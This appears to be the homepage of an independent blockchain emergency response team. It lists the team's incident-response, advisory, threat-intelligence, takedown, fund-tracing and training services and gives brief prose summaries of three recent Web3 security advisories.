Computer Emergency Response Team · Web3

When the chain is on fire, someone has to answer the phone.

0xCERT is an independent computer emergency response team for public blockchains. We coordinate incident response, advisories, and stolen-fund recovery across smart contracts, bridges, wallets, and Web3 infrastructure — 24/7, across every chain that matters.

Report an active incident What is a blockchain CERT?

› on-call · Initial triage within 60 minutes, 24/7

Stolen in 2025

$2.1B+

across tracked exploits

Median response

< 60 min

from report to triage

Chains covered

40+

L1s, L2s, and app-chains

Coverage

24/7/365

on-call rotation

Mission

A neutral coordination point for a multi-chain world.

Traditional CERTs were designed for IP networks, TLS certificates, and a small set of vendors. Blockchains have none of those assumptions. Code is the bank, the ledger is public, and the attacker keeps the funds the moment a transaction lands.

0xCERT exists because no one owns the incident. Protocols, bridges, wallets, validators, and exchanges all touch the blast radius of a single exploit, but none of them have the standing to coordinate the others. We do.

We are non-commercial, vendor-neutral, and chain-agnostic. We don't sell a product. We answer the phone, run the war room, publish the advisory, and feed the IOC list to everyone who needs it — for free.

Services

What we do, around the clock.

full catalog ›

0xCERT/ir

Incident Response

24/7 triage and containment for active blockchain incidents.

learn more ›

0xCERT/advisories

Advisories & Vulnerability Disclosure

CVE-style advisories for smart contracts and Web3 infrastructure.

learn more ›

0xCERT/ioc

Threat Intelligence & IOC Feeds

Curated indicators of compromise for the Web3 attack surface.

learn more ›

0xCERT/takedown

Phishing & Drainer Takedowns

Coordinated takedown of malicious sites and front-end takeovers.

learn more ›

0xCERT/tracing

Stolen-Fund Tracing & Recovery Support

On-chain forensics to follow stolen assets across chains and mixers.

learn more ›

0xCERT/training

Awareness & Training

Tabletop exercises and IR training for protocol and infra teams.

learn more ›

Recent advisories

Coordinated disclosure, made public.

all advisories ›

0xCERT-2026-0142

2026-05-22

Critical

Reentrancy via fallback in cross-chain settlement adapter

An unchecked external call in a widely deployed settlement adapter allows attacker-controlled tokens to re-enter and double-spend settlement messages. Patched in v2.4.7.

0xCERT-2026-0141

2026-05-19

High

Front-end takeover of a top-50 DEX via compromised CDN bucket

Attackers replaced bundle.js to inject a wallet drainer for ~3.5 hours. Affected users were re-routed to a malicious permit2 signer. IOCs published.

0xCERT-2026-0140

2026-05-15

Medium

Phishing campaign abusing legitimate ENS subdomains

Coordinated phishing campaign using purchased ENS subdomains pointing to drainer kits. Domain list distributed to wallet vendors.

Active incident?

Don't wait. Triage starts the moment you reach out.

If funds are moving, a key is exposed, or a front-end is serving malicious code — open a report. Our on-call engineer is paged immediately.

Open incident report Reach a human directly